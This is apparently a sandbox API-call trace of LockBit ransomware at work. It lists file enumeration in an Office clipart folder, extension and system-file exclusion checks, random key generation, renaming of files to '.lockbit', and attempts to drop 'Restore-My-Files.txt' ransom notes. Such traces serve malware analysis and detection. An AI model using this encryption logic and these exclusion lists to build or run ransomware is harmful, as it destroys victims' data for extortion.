[0106.437] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.437] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.437] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.lockbit") returned 72 [0106.437] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.437] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.437] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.438] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12982) returned 1 [0106.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.438] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0106.448] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.448] malloc (_Size=0xa6) returned 0x77d800 [0106.448] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.448] free (_Block=0x77d800) [0106.448] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.448] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.449] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee332800, ftCreationTime.dwHighDateTime=0x1bd4d59, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee332800, ftLastWriteTime.dwHighDateTime=0x1bd4d59, nFileSizeHigh=0x0, nFileSizeLow=0x25ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19827_.WMF", cAlternateFileName="")) returned 1 [0106.449] lstrcmpiW (lpString1=".", lpString2="BD19827_.WMF") returned -1 [0106.449] lstrcmpiW (lpString1="..", lpString2="BD19827_.WMF") returned -1 [0106.449] PathFindExtensionW (pszPath="BD19827_.WMF") returned=".WMF" [0106.449] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.449] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.450] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.450] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19827_.WMF") returned 1 [0106.451] lstrcmpiW (lpString1="ntldr", lpString2="BD19827_.WMF") returned 1 [0106.451] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19827_.WMF") returned 1 [0106.451] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19827_.WMF") returned 1 [0106.451] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19827_.WMF") returned -1 [0106.451] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19827_.WMF") returned 1 [0106.451] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19827_.WMF") returned 1 [0106.451] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.451] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned=".WMF" [0106.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.451] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.451] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.452] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.452] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.lockbit") returned 72 [0106.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.453] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.453] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.453] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9710) returned 1 [0106.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.453] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.454] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.458] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.458] malloc (_Size=0xa6) returned 0x77d800 [0106.458] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.460] free (_Block=0x77d800) [0106.460] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.460] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.461] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed01fb00, ftCreationTime.dwHighDateTime=0x1bd4d59, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed01fb00, ftLastWriteTime.dwHighDateTime=0x1bd4d59, nFileSizeHigh=0x0, nFileSizeLow=0x2244, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19828_.WMF", cAlternateFileName="")) returned 1 [0106.461] lstrcmpiW (lpString1=".", lpString2="BD19828_.WMF") returned -1 [0106.461] lstrcmpiW (lpString1="..", lpString2="BD19828_.WMF") returned -1 [0106.461] PathFindExtensionW (pszPath="BD19828_.WMF") returned=".WMF" [0106.461] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.461] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.462] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.462] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19828_.WMF") returned 1 [0106.462] lstrcmpiW (lpString1="ntldr", lpString2="BD19828_.WMF") returned 1 [0106.462] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19828_.WMF") returned 1 [0106.462] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19828_.WMF") returned 1 [0106.462] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19828_.WMF") returned -1 [0106.462] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19828_.WMF") returned 1 [0106.462] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19828_.WMF") returned 1 [0106.463] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned=".WMF" [0106.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.463] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.463] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.463] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.lockbit") returned 72 [0106.463] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.464] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.464] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.464] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8772) returned 1 [0106.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.465] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.469] malloc (_Size=0xa6) returned 0x77d800 [0106.469] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.471] free (_Block=0x77d800) [0106.471] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.471] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.471] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.471] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e2200, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe58e2200, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x3896, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19986_.WMF", cAlternateFileName="")) returned 1 [0106.471] lstrcmpiW (lpString1=".", lpString2="BD19986_.WMF") returned -1 [0106.471] lstrcmpiW (lpString1="..", lpString2="BD19986_.WMF") returned -1 [0106.471] PathFindExtensionW (pszPath="BD19986_.WMF") returned=".WMF" [0106.471] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.471] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned 